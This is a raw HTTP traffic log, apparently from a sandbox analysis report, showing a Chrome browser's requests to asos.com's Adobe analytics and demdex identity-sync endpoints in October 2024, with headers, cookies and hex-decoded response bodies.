                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://www.asos.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:15 UTC947INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:15 GMT
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      X-TID: yjD2JWk+T7U=
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                                      P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://www.asos.com
                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                      Location: https://dpm.demdex.net/id/rd?d_visid_ver=3.3.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&ts=1729807632848
                                                                                                                                                                                                                                                                                      DCS: dcs-prod-irl1-2-v067-085fb57a6.edge-irl1.demdex.com 0 ms
                                                                                                                                                                                                                                                                                      set-cookie: demdex=16215612898763276402808192961366232505; Max-Age=15552000; Expires=Tue, 22 Apr 2025 22:07:15 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      53192.168.2.164984252.208.241.2104436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:16 UTC780OUTGET /id/rd?d_visid_ver=3.3.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&ts=1729807632848 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: dpm.demdex.net
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://www.asos.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: demdex=16215612898763276402808192961366232505
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:16 UTC817INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:16 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/json;charset=utf-8
                                                                                                                                                                                                                                                                                      Content-Length: 363
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      X-TID: WUsV3xIyQA4=
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                                      P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://www.asos.com
                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                      DCS: dcs-prod-irl1-1-v067-089bbe4e6.edge-irl1.demdex.com 2 ms
                                                                                                                                                                                                                                                                                      set-cookie: demdex=16215612898763276402808192961366232505; Max-Age=15552000; Expires=Tue, 22 Apr 2025 22:07:16 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:16 UTC363INData Raw: 7b 22 64 5f 6d 69 64 22 3a 22 31 36 35 31 37 36 32 32 33 31 30 35 38 39 30 31 35 32 34 32 37 37 39 39 37 39 39 34 30 39 39 36 32 34 36 33 38 39 22 2c 22 69 64 5f 73 79 6e 63 5f 74 74 6c 22 3a 36 30 34 38 30 30 2c 22 64 5f 62 6c 6f 62 22 3a 22 52 4b 68 70 52 7a 38 6b 72 67 32 74 4c 4f 36 70 67 75 58 57 70 35 6f 6c 6b 41 63 55 6e 69 51 59 50 48 61 4d 57 57 67 64 4a 33 78 7a 50 57 51 6d 64 6a 30 79 22 2c 22 64 63 73 5f 72 65 67 69 6f 6e 22 3a 36 2c 22 64 5f 6f 74 74 6c 22 3a 37 32 30 30 2c 22 69 62 73 22 3a 5b 7b 22 69 64 22 3a 22 34 31 31 22 2c 22 74 74 6c 22 3a 31 30 30 38 30 2c 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 66 69 72 65 55 52 4c 53 79 6e 63 22 3a 31 2c 22 73 79 6e 63 4f 6e 50 61 67 65 22 3a 31 2c 22 75 72 6c 22 3a 5b 22 2f 2f 63 6d 2e 65 76 65 72
                                                                                                                                                                                                                                                                                      Data Ascii: {"d_mid":"16517622310589015242779979940996246389","id_sync_ttl":604800,"d_blob":"RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y","dcs_region":6,"d_ottl":7200,"ibs":[{"id":"411","ttl":10080,"tag":"img","fireURLSync":1,"syncOnPage":1,"url":["//cm.ever


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      54192.168.2.164984834.250.93.704436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:17 UTC756OUTGET /dest5.html?d_nsid=undefined HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: asos.demdex.net
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                                      Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: demdex=16215612898763276402808192961366232505
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:17 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:17 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 6983
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      X-TID: qE9ncTtySi4=
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                                      P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      last-modified: Wed, 16 Oct 2024 08:53:46 GMT
                                                                                                                                                                                                                                                                                      DCS: dcs-prod-irl1-1-v067-0199020e5.edge-irl1.demdex.com 0 ms
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:17 UTC6983INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 41 64 6f 62 65 20 41 75 64 69 65 6e 63 65 4d 61 6e 61 67 65 72 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Adobe AudienceManager</title><script type="text/javas


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      55192.168.2.164984652.17.200.404436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:17 UTC533OUTGET /id/rd?d_visid_ver=3.3.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&ts=1729807632848 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: dpm.demdex.net
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: demdex=16215612898763276402808192961366232505
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:17 UTC712INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:17 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/json;charset=utf-8
                                                                                                                                                                                                                                                                                      Content-Length: 363
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      X-TID: H4Bei7oOS+8=
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                                      P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                                      DCS: dcs-prod-irl1-1-v067-0199020e5.edge-irl1.demdex.com 2 ms
                                                                                                                                                                                                                                                                                      set-cookie: demdex=16215612898763276402808192961366232505; Max-Age=15552000; Expires=Tue, 22 Apr 2025 22:07:17 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:17 UTC363INData Raw: 7b 22 64 5f 6d 69 64 22 3a 22 31 36 35 31 37 36 32 32 33 31 30 35 38 39 30 31 35 32 34 32 37 37 39 39 37 39 39 34 30 39 39 36 32 34 36 33 38 39 22 2c 22 69 64 5f 73 79 6e 63 5f 74 74 6c 22 3a 36 30 34 38 30 30 2c 22 64 5f 62 6c 6f 62 22 3a 22 52 4b 68 70 52 7a 38 6b 72 67 32 74 4c 4f 36 70 67 75 58 57 70 35 6f 6c 6b 41 63 55 6e 69 51 59 50 48 61 4d 57 57 67 64 4a 33 78 7a 50 57 51 6d 64 6a 30 79 22 2c 22 64 63 73 5f 72 65 67 69 6f 6e 22 3a 36 2c 22 64 5f 6f 74 74 6c 22 3a 37 32 30 30 2c 22 69 62 73 22 3a 5b 7b 22 69 64 22 3a 22 34 31 31 22 2c 22 74 74 6c 22 3a 31 30 30 38 30 2c 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 66 69 72 65 55 52 4c 53 79 6e 63 22 3a 31 2c 22 73 79 6e 63 4f 6e 50 61 67 65 22 3a 31 2c 22 75 72 6c 22 3a 5b 22 2f 2f 63 6d 2e 65 76 65 72
                                                                                                                                                                                                                                                                                      Data Ascii: {"d_mid":"16517622310589015242779979940996246389","id_sync_ttl":604800,"d_blob":"RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y","dcs_region":6,"d_ottl":7200,"ibs":[{"id":"411","ttl":10080,"tag":"img","fireURLSync":1,"syncOnPage":1,"url":["//cm.ever


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      56192.168.2.164984763.140.62.2224436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:17 UTC2317OUTGET /id?d_visid_ver=3.3.0&d_fieldgroup=A&mcorgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&mid=16517622310589015242779979940996246389&ts=1729807635045 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: metrics.asos.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://www.asos.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: geocountry=US; bm_sz=66435E81E02E031738C051A9C8A74AF3~YAAQF/AQAsZeXK+SAQAAPMKRwBmbT1ort/PqojSUhpdsyHRIfHwsQUxvVepaTsNYtWsG1Dl/xJqL+CVPH+iigYMT7vVUY1stUT+KiywrgeEluljLSKNdUVBoafeQKYHgt5gK1cPPBUCroecFDNTYLbgLqxCba7/3lOOaBEs+uIoGJVa4hsi3ovF8uyVOFeRdHfABs/MIPbhRAl956CgROvYu36x0zeq24E97kGOtElsnp0cU4WGYbqXdHakBub5G3QZLjufqAJjCchWDhFLkSS27DaUY6c0AiG6lcCCuuvVmcH6ZrAvvIJWhIF1NjLTb+N7sRGZEna6vEj4VhOR5aU6iYRaH35OfGS3352Z2fs8P+meV/Tr1u75lasHr0ICGeiU=~3490353~4536372; s_pers=%20eVar225%3D1%7C1729809432855%3B%20s_vnum%3D1730433600857%2526vn%253D1%7C1730433600857%3B%20s_invisit%3Dtrue%7C1729809432857%3B%20visitCount%3D1%7C1729809432866%3B; _abck=78BB01D303A00543970FBC58A9F5D796~-1~YAAQF/AQAv5eXK+SAQAAzNCRwAz1EQetbN0ZgQmgvP0WaTQw8QOKRtZG0rIGe7lWjHyroAspp8Gj1XhtFuHidQmnpD42BSXX9CRd+adEtgdMQhZkklufnjCL/8bn371kB7uXvifhtiuqyxLQODidPx3dbDxj+Da4u9EasZaUPJjd4ZvOr0gWR/BoN6wZe2kbLTbsMfhEx9E2thnQWihK+vN5Y3HV7b2mVv3fFMQLzyC/0swr2431Bh8rSlF65d8akI0MvGTFZYf9FkPaYvu0o+GQ/Rt7BaYsW2BZUVuxEXiU8zIiW4j3iLRsINVpT6D8VLRXyi7Bai5jL1J+iggHr [TRUNCATED]
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:17 UTC666INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      access-control-allow-origin: https://www.asos.com
                                                                                                                                                                                                                                                                                      access-control-allow-credentials: true
                                                                                                                                                                                                                                                                                      date: Thu, 24 Oct 2024 22:07:17 GMT
                                                                                                                                                                                                                                                                                      p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                                      server: jag
                                                                                                                                                                                                                                                                                      set-cookie: s_ecid=MCMID%7C16517622310589015242779979940996246389; Path=/; Domain=asos.com; Max-Age=63072000; Expires=Sat, 24 Oct 2026 22:07:07 GMT; SameSite=Lax;
                                                                                                                                                                                                                                                                                      vary: Origin
                                                                                                                                                                                                                                                                                      content-type: application/x-javascript;charset=utf-8
                                                                                                                                                                                                                                                                                      content-length: 48
                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                      cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:17 UTC48INData Raw: 7b 22 6d 69 64 22 3a 22 31 36 35 31 37 36 32 32 33 31 30 35 38 39 30 31 35 32 34 32 37 37 39 39 37 39 39 34 30 39 39 36 32 34 36 33 38 39 22 7d
                                                                                                                                                                                                                                                                                      Data Ascii: {"mid":"16517622310589015242779979940996246389"}


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      57192.168.2.164985063.140.62.174436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:18 UTC2141OUTGET /id?d_visid_ver=3.3.0&d_fieldgroup=A&mcorgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&mid=16517622310589015242779979940996246389&ts=1729807635045 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: metrics.asos.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: geocountry=US; bm_sz=66435E81E02E031738C051A9C8A74AF3~YAAQF/AQAsZeXK+SAQAAPMKRwBmbT1ort/PqojSUhpdsyHRIfHwsQUxvVepaTsNYtWsG1Dl/xJqL+CVPH+iigYMT7vVUY1stUT+KiywrgeEluljLSKNdUVBoafeQKYHgt5gK1cPPBUCroecFDNTYLbgLqxCba7/3lOOaBEs+uIoGJVa4hsi3ovF8uyVOFeRdHfABs/MIPbhRAl956CgROvYu36x0zeq24E97kGOtElsnp0cU4WGYbqXdHakBub5G3QZLjufqAJjCchWDhFLkSS27DaUY6c0AiG6lcCCuuvVmcH6ZrAvvIJWhIF1NjLTb+N7sRGZEna6vEj4VhOR5aU6iYRaH35OfGS3352Z2fs8P+meV/Tr1u75lasHr0ICGeiU=~3490353~4536372; s_pers=%20eVar225%3D1%7C1729809432855%3B%20s_vnum%3D1730433600857%2526vn%253D1%7C1730433600857%3B%20s_invisit%3Dtrue%7C1729809432857%3B%20visitCount%3D1%7C1729809432866%3B; RT="z=1&dm=asos.com&si=2a741c90-c15a-4741-ad5f-9ff5e6d0d0dd&ss=m2nussgu&sl=0&tt=0&bcn=%2F%2F684dd329.akstat.io%2F"; AMCVS_C0137F6A52DEAFCC0A490D4C%40AdobeOrg=1; _abck=78BB01D303A00543970FBC58A9F5D796~-1~YAAQC/AQAvDVW6+SAQAAbteRwAxnBLtDzc+2YIcn7Ymp4ISiOCCB9s+MWpxwlqJaLok6X4nZlPYMgIZKNc+4LLiysol0lKhFcL8yAYlu/E7hcG8agGno+10AAs1X0BuBJLhQS9+FGZ6YxV0UFlN7Sk0lF5QKu2k2tB8cw7RzKP2eTLDUn2Pl [TRUNCATED]
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:18 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                                                                      date: Thu, 24 Oct 2024 22:07:18 GMT
                                                                                                                                                                                                                                                                                      p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                                      server: jag
                                                                                                                                                                                                                                                                                      set-cookie: s_ecid=MCMID%7C16517622310589015242779979940996246389; Path=/; Domain=asos.com; Max-Age=63072000; Expires=Sat, 24 Oct 2026 22:07:07 GMT; SameSite=Lax;
                                                                                                                                                                                                                                                                                      vary: Origin
                                                                                                                                                                                                                                                                                      content-type: application/x-javascript;charset=utf-8
                                                                                                                                                                                                                                                                                      content-length: 48
                                                                                                                                                                                                                                                                                      strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                      cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                                                                      connection: close
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:18 UTC48INData Raw: 7b 22 6d 69 64 22 3a 22 31 36 35 31 37 36 32 32 33 31 30 35 38 39 30 31 35 32 34 32 37 37 39 39 37 39 39 34 30 39 39 36 32 34 36 33 38 39 22 7d
                                                                                                                                                                                                                                                                                      Data Ascii: {"mid":"16517622310589015242779979940996246389"}


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      58192.168.2.164984952.208.241.2104436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:18 UTC872OUTGET /id?d_visid_ver=3.3.0&d_fieldgroup=AAM&d_rtbd=json&d_ver=2&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&d_mid=16517622310589015242779979940996246389&d_blob=RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y&ts=1729807636417 HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: dpm.demdex.net
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Origin: https://www.asos.com
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                      Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      Cookie: demdex=16215612898763276402808192961366232505
                                                                                                                                                                                                                                                                                      2024-10-24 22:07:18 UTC817INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:07:18 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/json;charset=utf-8
                                                                                                                                                                                                                                                                                      Content-Length: 363
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      X-TID: 6NId5lf6Tm4=
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                                      P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://www.asos.com
                                                                                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                      DCS: dcs-prod-irl1-2-v067-0db54ea90.edge-irl1.demdex.com 2 ms
                                                                                                                                                                                                                                                                                      set-cookie: demdex=16215612898763276402808192961366232505; Max-Age=15552000; Expires=Tue, 22 Apr 2025 22:07:18 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
